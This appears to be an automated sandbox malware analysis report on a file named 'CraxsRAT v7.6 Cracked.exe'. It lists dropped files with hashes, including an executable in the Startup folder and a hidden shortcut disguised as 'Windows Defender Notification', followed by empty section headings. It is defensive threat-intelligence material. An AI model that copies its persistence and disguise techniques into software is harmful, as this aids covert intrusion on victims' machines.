C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyjfiawj.irx.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdpziknj.hqn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mey14p4l.3bu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_noxmwwun.okb.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2frp4tu.ofe.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq2b5tgk.wwp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z23shyow.2ux.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	FC15FB0CEC248EA16A6EDA92AB97B1F8	01AF6A8E81A92487ED29B9706EF8C86957666A45	73E71DC70F6DAEEBD9A257D0B0C6E67E87C6D50B27EB94AF08D15F1AFB6ED02C
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Notification.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 6 05:35:14 2024, mtime=Wed Nov 6 05:35:14 2024, atime=Wed Nov 6 05:35:14 2024, length=77312, window=hide	3E9C487859B9507C3CB2810E04B3FCC6	A3782A8304A66003330624834760E8309193AA48	F741BE81E7C5598AE5BF9D730D2F327C281419DE7E564C4FD7666EC0FC4F817D
C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8D6E86E6E799C75BD5123534BDBF411B	9FC526E97077ED2A5E78371FDAB5AB7ECF789368	7892C9F14967696E15B99B3EAC66D65643357C9A4315F5E8210C8437C6617888
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	571A49E6AA98FAE6F5FC59CE14F88913	E2E44949519859679C7C482F29894D9858995DD2	D1820B3718E13A4F4331DE9ABB2C22B0CC80A5A52C573AB4F29ED6FB33D13FE3
\Device\ConDrv	ASCII text, with CRLF line terminators	689E2126A85BF55121488295EE068FA1	09BAAA253A49D80C18326DFBCA106551EBF22DD6	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25

Windows Analysis Report CraxsRAT v7.6 Cracked.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
CraxsRAT v7.6 Cracked.exe

Malware Threat Intel
Provided by